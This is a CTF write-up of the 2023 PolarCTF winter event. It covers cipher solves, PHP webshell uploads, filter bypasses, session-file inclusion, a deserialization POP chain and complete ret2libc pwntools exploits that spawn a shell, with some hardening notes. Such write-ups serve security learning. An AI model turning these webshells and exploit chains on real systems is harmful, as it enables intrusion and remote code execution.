2023 Polar CTF Winter Individual Challenge: partial writeups
This was my first time taking part in a PolarCTF event and I didn't do well; I'm posting the writeups for the challenges I did solve to share the approach. If anything is wrong, corrections from more experienced players are welcome.
Challenges that can still be reproduced can be done on the platform.
misc
1-1 签到喵 (sign-in)
crypto
2-5 base
Base64 with a substituted alphabet.
First map j2rXjx8wSZjD back onto the standard base64 alphabet using the substitution table the challenge provides,
then base64-decode the result.
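Added example (not the author's solve script): a decoder for base64 with a substituted alphabet. The challenge's table is not reproduced on this page, so CUSTOM_ALPHABET below is a constructed stand-in (the standard table rotated by 20 positions); swap in the real table and the decode is the same. Decoding is strict, so a character that the table does not cover fails loudly instead of being silently dropped.

```python
import base64

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed example table (assumption: the challenge's real table is not on
# this page). Any 64 distinct characters work the same way.
CUSTOM_ALPHABET = STD_ALPHABET[20:] + STD_ALPHABET[:20]


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must contain exactly 64 distinct characters")
    if "=" in alphabet:
        raise ValueError("'=' is reserved for padding")


def custom_b64decode(data: str, alphabet: str) -> bytes:
    """Translate custom-alphabet base64 onto the standard table, then decode."""
    _check_alphabet(alphabet)
    normalised = data.translate(str.maketrans(alphabet, STD_ALPHABET))
    # Challenges often strip the '=' padding; restore it to a multiple of 4.
    normalised += "=" * (-len(normalised) % 4)
    # validate=True rejects any character the table did not map, instead of
    # silently discarding it and producing a plausible-looking wrong answer.
    return base64.b64decode(normalised, validate=True)


def custom_b64encode(raw: bytes, alphabet: str) -> str:
    """Inverse operation, useful to confirm a recovered table round-trips."""
    _check_alphabet(alphabet)
    return base64.b64encode(raw).decode().translate(str.maketrans(STD_ALPHABET, alphabet))


if __name__ == "__main__":
    ct = custom_b64encode(b"flag{example}", CUSTOM_ALPHABET)
    print(ct, custom_b64decode(ct, CUSTOM_ALPHABET))
```

If the challenge hands you a table with the characters in cipher order rather than as a 64-character string, build `alphabet` by joining it in the order that corresponds to values 0..63.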
2-6 AFF
Affine cipher.
The key (a, b) is not given, so both have to be brute-forced.
Brute-force every (a, b) and look for the candidate that reads as a flag.
The ciphertext must be uppercase, because the script maps letters to 0..25 with ord(c) - 65 (65 is 'A').
flag = "WMPTPTRGGPED"          # ciphertext, uppercase only
flaglist = []
for i in flag:
    flaglist.append(ord(i) - 65)   # 'A'..'Z' -> 0..25
for a in range(1, 26):
    for b in range(26):            # every shift, including 0
        flags = ""
        for i in flaglist:
            # find the plaintext letter j that encrypts to i under (a, b);
            # because b runs over the whole range, a*j - b also covers a*j + b
            for j in range(0, 26):
                c = (a * j - b) % 26
                if (c == i):
                    flags += chr(j + 65)
        # values of a not coprime with 26 print garbage (several j per letter); ignore those lines
        print('flag{' + flags + '}')
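Added example, not the author's script: the same brute force done with proper affine decryption, p = a^-1 (c - b) mod 26, restricting a to the twelve values coprime with 26 and trying every b, so each key yields exactly one candidate and the list is 312 lines instead of 625. It goes one step beyond the page by sorting candidates with a crude English letter-frequency score; that heuristic is my addition and is only meant to move the readable line up, not to replace looking at the output.

```python
from math import gcd
from string import ascii_uppercase as ALPHA

ENGLISH_ORDER = "ETAOINSHRDLCUMWFGYPBVKJXQZ"   # most to least frequent


def affine_encrypt(pt: str, a: int, b: int) -> str:
    if gcd(a, 26) != 1:
        raise ValueError("a must be coprime with 26")
    return "".join(ALPHA[(a * ALPHA.index(c) + b) % 26] for c in pt.upper() if c in ALPHA)


def affine_decrypt(ct: str, a: int, b: int) -> str:
    """p = a^-1 * (c - b) mod 26; pow(a, -1, 26) is the modular inverse (Python 3.8+)."""
    if gcd(a, 26) != 1:
        raise ValueError("a must be coprime with 26")
    a_inv = pow(a, -1, 26)
    return "".join(ALPHA[(a_inv * (ALPHA.index(c) - b)) % 26] for c in ct.upper() if c in ALPHA)


def brute_force(ct: str) -> dict:
    """All 12 * 26 = 312 valid keys mapped to their decryption."""
    return {(a, b): affine_decrypt(ct, a, b)
            for a in range(1, 26) if gcd(a, 26) == 1
            for b in range(26)}


def fitness(pt: str) -> int:
    """Crude English score: frequent letters earn more points (heuristic, my addition)."""
    return sum(26 - ENGLISH_ORDER.index(c) for c in pt)


def rank(ct: str) -> list:
    """Candidates ordered best-first; still read the top few by eye."""
    return sorted(brute_force(ct).items(), key=lambda kv: -fitness(kv[1]))


if __name__ == "__main__":
    for key, pt in rank("WMPTPTRGGPED")[:10]:
        print(key, "flag{" + pt + "}")
```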
web
3-1 cool
3-5 ezphp
"Exposed to crawlers" is a hint towards robots.txt.
File.php: a file include.
upload.php: a file upload.
Upload a file named shell.jpg whose content is a one-line webshell,
then include it through File.php.
3-6 你的马呢? (Where's your shell?)
Read the upload.php source through the include point with php://filter:
http://fb602834-16d0-4a66-ad42-cab8127f56f3.www.polarctf.com:8090/index.php?file=php://filter/read=convert.base64-encode/resource=upload.php
The upload has a content check.
Use <?= instead of <?php.
Upload a file named shell.jpg whose content is a one-line webshell,
then include it.
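Added example covering 3-5 and 3-6, not code from the challenge: building the php://filter read URL, pulling the base64 source dump out of the response, and testing webshell variants against a blacklist that only looks for <?php, beside a stricter check that rejects any PHP open tag and also requires real JPEG magic bytes. The blacklist is a hypothetical reconstruction of the kind of check the page describes; the real upload.php filter is not reproduced here, and the host and parameter names in the usage call are placeholders.

```python
import base64
import re
from urllib.parse import quote, urljoin


def filter_read_url(base: str, script: str, resource: str) -> str:
    """php://filter makes the include point return the file base64-encoded instead of executing it."""
    wrapper = f"php://filter/read=convert.base64-encode/resource={resource}"
    return urljoin(base, script) + "?file=" + quote(wrapper, safe="/:=")


def decode_filter_dump(body: str) -> str:
    """The dumped source is one long base64 blob somewhere in the HTML; extract and decode it."""
    m = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not m:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(m.group(0)).decode()


# Hypothetical blacklist in the style the page describes: it only searches for
# the long open tag, so the short echo tag slips through.
def naive_content_check(content: bytes) -> bool:
    return b"<?php" not in content.lower()


# Hardened check: refuse any PHP open tag (<?php, <?=, <?) and insist that the
# bytes actually start like a JPEG rather than trusting the .jpg name.
def strict_content_check(content: bytes) -> bool:
    if re.search(rb"<\?(php|=)?", content, re.IGNORECASE):
        return False
    return content.startswith(b"\xff\xd8\xff")


WEBSHELLS = {
    "long_tag": b'<?php eval($_POST["cmd"]); ?>',
    "echo_tag": b'<?=eval($_POST["cmd"]);?>',
}


def bypass_candidates(check) -> list:
    """Names of the webshell bodies that a given upload check would accept."""
    return [name for name, body in WEBSHELLS.items() if check(body)]


if __name__ == "__main__":
    print(filter_read_url("http://target.example/", "index.php", "upload.php"))
    print("naive check accepts:", bypass_candidates(naive_content_check))
    print("strict check accepts:", bypass_candidates(strict_content_check))
```

Even the strict check is only a content filter; the actual fix for 3-5 and 3-6 is to stop including user-controlled paths and to store uploads outside the web root with a server-chosen name.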
3-8 phpurl
The script URL-decodes the parameter a second time, so double-URL-encode the required string with Burp Suite (the payload below is the double encoding of xxs).
Payload: index.php?sys=%2578%2578%2573
flag{5caecd63b7dca4bcee15d262eb3af4f4}
3-10 你想逃也逃不掉 (no escape)
Source:
<?php
/*
https://ytyyds.github.io/ (unrelated to this challenge)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';
$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
    echo file_get_contents('flag.php');
}
The filter deletes characters after serialize() has already written the string lengths, so a string-escape payload (declared length longer than the remaining content) can be used to bypass the check.
The parameters are as follows:
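Added example, not part of the original writeup: building the string-escape payload for 3-10 offline. It reimplements serialize() for a flat array of strings, the challenge's preg_replace, and just enough of unserialize() (stopping at the closing brace and ignoring what trails it, as PHP does) to verify the payload before sending it. The choice of gif as the deleted keyword and the exact injected passwd string are my construction; any of the filtered words works as long as the deleted byte count lands exactly on the gap.

```python
import re
from urllib.parse import quote


def php_serialize(arr: dict) -> str:
    """PHP serialize() for a flat associative array of ASCII strings."""
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in arr.items())
    return f"a:{len(arr)}:{{{body}}}"


def challenge_filter(s: str) -> str:
    """Same preg_replace as the challenge source."""
    return re.sub(r"phtml|php3|php4|php5|aspx|gif", "", s)


def php_unserialize(s: str) -> dict:
    """Minimal unserialize() for the array-of-strings shape above. It reads exactly
    the declared number of bytes per string and stops at the closing brace, so the
    leftover original tail after the injected '}' is ignored, as in PHP."""
    m = re.match(r"a:(\d+):\{", s)
    if not m:
        raise ValueError("not an array")
    pos, count, out = m.end(), int(m.group(1)), {}

    def read_string():
        nonlocal pos
        h = re.match(r's:(\d+):"', s[pos:])
        if not h:
            raise ValueError(f"expected string at offset {pos}")
        start = pos + h.end()
        end = start + int(h.group(1))
        if s[end:end + 2] != '";':
            raise ValueError(f"length mismatch at offset {start}")
        pos = end + 2
        return s[start:end]

    for _ in range(count):
        key = read_string()
        out[key] = read_string()
    if s[pos] != "}":
        raise ValueError("missing closing brace")
    return out


def build_payload(keyword: str = "gif") -> tuple:
    """Return (name, passwd). Every deleted keyword in name shrinks the content by
    len(keyword) bytes while the declared length stays, so the username value
    swallows the bytes between it and passwd. passwd then supplies its own
    closing quote, a dummy passwd element and a forged sign, keeping 3 elements."""
    for pad in range(len(keyword)):
        dummy = "x" * pad
        inject = f'";s:6:"passwd";s:{len(dummy)}:"{dummy}";s:4:"sign";s:6:"ytyyds";}}'
        swallow = len(f'";s:6:"passwd";s:{len(inject)}:"')
        if swallow % len(keyword) == 0:
            return keyword * (swallow // len(keyword)), inject
    raise RuntimeError("no padding aligns the gap")


def solve() -> dict:
    """Run the payload through the same pipeline as the server and return what unserialize() sees."""
    name, passwd = build_payload()
    user = {"username": name, "passwd": passwd, "sign": "123456"}
    return php_unserialize(challenge_filter(php_serialize(user)))


if __name__ == "__main__":
    name, passwd = build_payload()
    print("POST name=" + name)
    print("GET  passwd=" + quote(passwd, safe=""))
    print(solve())
```

name goes in the POST body and passwd in the query string, URL-encoded as the usage call prints it; the quotes, semicolons and braces in passwd must survive transport byte for byte or the lengths no longer line up.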
3-11 safe_include
Idea: get a one-line webshell written into the session file.
The parameter is both included and stored in $_SESSION, so the payload lands in /tmp/sess_<PHPSESSID>, which is inside open_basedir and can then be included.
Challenge source:
<?php
show_source(__FILE__);
@session_start();
ini_set('open_basedir', '/var/www/html/:/tmp/');
$sys = @$_SESSION['xxs'];
if (isset($_GET['xxs'])) {
    $sys = $_GET['xxs'];
}
@include $sys;
$_SESSION['xxs'] = $sys;
First send the one-line webshell as the xxs parameter (the include of that string fails silently, but the value is stored in the session),
then include the session file: ?xxs=/tmp/sess_45127ho2viath8q3602pobfu71
The flag is read successfully.
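Added example for 3-11, not the author's code: the two-request flow using only the standard library, plus a helper that renders what PHP's default session serializer writes into the session file, which is why include() of that file executes the tag. The target URL, the POST parameter name cmd and the session-id pattern are assumptions; the session id in the test is the one from the writeup above.

```python
import re
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie

WEBSHELL = '<?php eval($_POST["cmd"]); ?>'   # parameter name "cmd" is an assumption


def php_session_record(key: str, value: str) -> str:
    """Layout written by session.serialize_handler = php: name|serialized value.
    The value is stored verbatim, so the PHP open tag inside it is intact when the
    file is later passed to include()."""
    return f'{key}|s:{len(value.encode())}:"{value}";'


def session_file_path(session_id: str) -> str:
    """Default session.save_path layout; refuse anything that is not a session id
    so a typo cannot turn into an arbitrary path."""
    if not re.fullmatch(r"[A-Za-z0-9,-]{22,256}", session_id):
        raise ValueError("not a valid PHPSESSID")
    return f"/tmp/sess_{session_id}"


def exploit(base_url: str, cmd: str) -> bytes:
    """Request 1 seeds the session file; request 2 includes it and runs cmd."""
    seed = base_url + "?xxs=" + urllib.parse.quote(WEBSHELL, safe="")
    with urllib.request.urlopen(seed) as r1:
        cookie = SimpleCookie(r1.headers.get("Set-Cookie", ""))
    if "PHPSESSID" not in cookie:
        raise RuntimeError("server did not start a session")
    sid = cookie["PHPSESSID"].value
    # Deliberately send no cookie here: with a fresh session the seeded file is
    # only read by include(), whereas reusing the session would overwrite it
    # with the path string at request end and the shell would work only once.
    trigger = base_url + "?xxs=" + session_file_path(sid)
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    with urllib.request.urlopen(trigger, data=body) as r2:
        return r2.read()


if __name__ == "__main__":
    print(php_session_record("xxs", WEBSHELL))
    # print(exploit("http://target.example/index.php", "system('cat /var/www/html/flag.php');"))
```

The hardening is not a better open_basedir: whatever is stored in the session comes straight from the request, so the include must not take a user-controlled path at all (a fixed allowlist of template names is the usual fix).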
3-12 苦海 (sea of suffering)
Deserialization: build a POP chain.
<?php
class User
{
    public $name;
    public $flag;
}
class FileRobot
{
    public $filename = '../flag.php';
    public $path;
}
class Surrender
{
    private $phone;
    public $promise;
}
$user = new User();
$s = new Surrender();
$f1 = new FileRobot();
$f2 = new FileRobot();
$f1->path = $f2;
$user->name = $s;
$user->name->file = ['filename' => $f1];   // 'file' is a dynamic property, not declared on Surrender
// serialize and print
echo urlencode(serialize($user));
The resulting POP chain payload:
O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A3%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3BN%3Bs%3A7%3A%22promise%22%3BN%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BN%3B%7D%7D%7D%7Ds%3A4%3A%22flag%22%3BN%3B%7D
Response: hi, Welcome to Polar D&N ~ PD9waHAgDQoJJGZsYWcgPSAnZmxhZ3s2M2RkMGU5ZmJhZGQ2NjM1NDJhMmY4ZWExY2NjNjc2NX0nOw0KCT8+
Base64-decode the blob to get the flag.
pwn
5-4 look
32-bit binary with NX (non-executable stack) enabled.
Decompile it with IDA.
There is a stack overflow in the start function.
The binary has no function that spawns a shell, so first leak a libc address, locate system, then overflow again to get a shell.
A simple 32-bit ret2libc.
Exp:
from pwn import *
context(os='linux', arch='i386', log_level='debug')   # 32-bit target
p = remote('120.46.59.242', 2141)
write_plt = 0x80483E0
write_got = 0x804A018
main = 0x8048410
# 108 bytes of buffer + 4 bytes of saved ebp, then ret -> write@plt,
# returning to main for a second overflow; args: write(1, write_got, 4)
payload = b'a'*108 + p32(0) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
print(hex(write_addr))
# offsets are for the challenge's libc; recompute them for a different build
libc_base = write_addr - 0x0d44d0
bin_sh = libc_base + 0x15912b
system = libc_base + 0x03a950
# system("/bin/sh") with main as the fake return address
payload = b'a'*108 + p32(0) + p32(system) + p32(main) + p32(bin_sh)
p.sendline(payload)
p.interactive()
5-10 05ret2libc_64
64-bit binary with NX enabled.
Decompile it with IDA.
Analysis shows a stack overflow in the putting function.
The binary has no function that spawns a shell, so first leak a libc address to locate system, then use the stack overflow to call system("/bin/sh").
64-bit ret2libc.
Exp:
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote('120.46.59.242', 2124)
puts_plt = 0x4005A0
gets_got = 0x601038
pop_rdi = 0x400843
main = 0x400610
# 256 bytes of buffer + 8 bytes of saved rbp, then puts(gets@got) and return to main for a second overflow
payload = b'a'*256 + p64(0) + p64(pop_rdi) + p64(gets_got) + p64(puts_plt) + p64(main)
p.recvuntil(b'question:\n')
p.sendline(payload)
p.recvuntil(b'Maybe the answer is 0\n')
# puts stops at the first NUL byte, so the pointer arrives as 6 bytes; pad to 8 before unpacking
gets_addr = u64(p.recv(6).ljust(8, b'\x00'))
# offsets are for the challenge's libc; recompute them for a different build
libc_base = gets_addr - 0x06ed90
bin_sh = libc_base + 0x18ce57
system = libc_base + 0x0453a0
# pop rdi; ret -> "/bin/sh", then system, with main as the return address
payload = b'a'*256 + p64(0) + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(main)
p.sendline(payload)
p.interactive()
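Added example, not from the writeup: the chain layouts from both exploits written as plain struct helpers (no pwntools needed), with the leak parsing and a libc-base sanity check that catches the most common failure, an offset taken from a different libc build. The addresses in the usage call are the ones from 5-4 and 5-10 above; the general shape is the same for any ret2libc, only padding, gadget and offsets change.

```python
import struct


def p32(v: int) -> bytes:
    return struct.pack("<I", v & 0xffffffff)


def p64(v: int) -> bytes:
    return struct.pack("<Q", v & 0xffffffffffffffff)


def leak_chain_x86(filler: bytes, call_plt: int, ret: int, args: tuple) -> bytes:
    """cdecl: overwritten return address, then the callee's own return address,
    then its arguments left to right on the stack."""
    return filler + p32(call_plt) + p32(ret) + b"".join(p32(a) for a in args)


def leak_chain_x64(filler: bytes, pop_rdi: int, arg: int, call_plt: int, ret: int) -> bytes:
    """SysV: the first argument lives in rdi, so load it with a gadget first."""
    return filler + p64(pop_rdi) + p64(arg) + p64(call_plt) + p64(ret)


def parse_leak(data: bytes, bits: int) -> int:
    """write() returns the requested 4 bytes; puts() stops at the first NUL, so a
    64-bit user-space pointer arrives as 6 bytes and must be zero-padded to 8."""
    if bits == 32:
        return struct.unpack("<I", data[:4])[0]
    return struct.unpack("<Q", data[:6].ljust(8, b"\x00"))[0]


def libc_base(leaked: int, symbol_offset: int) -> int:
    """libc is mapped page-aligned; a base with low bits set means the offset
    does not belong to the libc the target is actually running."""
    base = leaked - symbol_offset
    if base & 0xfff:
        raise ValueError(f"libc base {base:#x} is not page-aligned: wrong offset or wrong libc build")
    return base


if __name__ == "__main__":
    # 5-4 stage 1: write(1, write@got, 4), return to main
    stage1 = leak_chain_x86(b"a" * 108 + p32(0), 0x80483E0, 0x8048410, (1, 0x804A018, 4))
    # 5-10 stage 1: puts(gets@got), return to main
    stage1_64 = leak_chain_x64(b"a" * 256 + p64(0), 0x400843, 0x601038, 0x4005A0, 0x400610)
    print(stage1.hex())
    print(stage1_64.hex())
```

The second stage has the same shape with system in place of the leak function and the "/bin/sh" address as the argument. On 64-bit targets, if system crashes inside a movaps instruction the stack is misaligned by 8; insert a lone ret gadget before system to realign it.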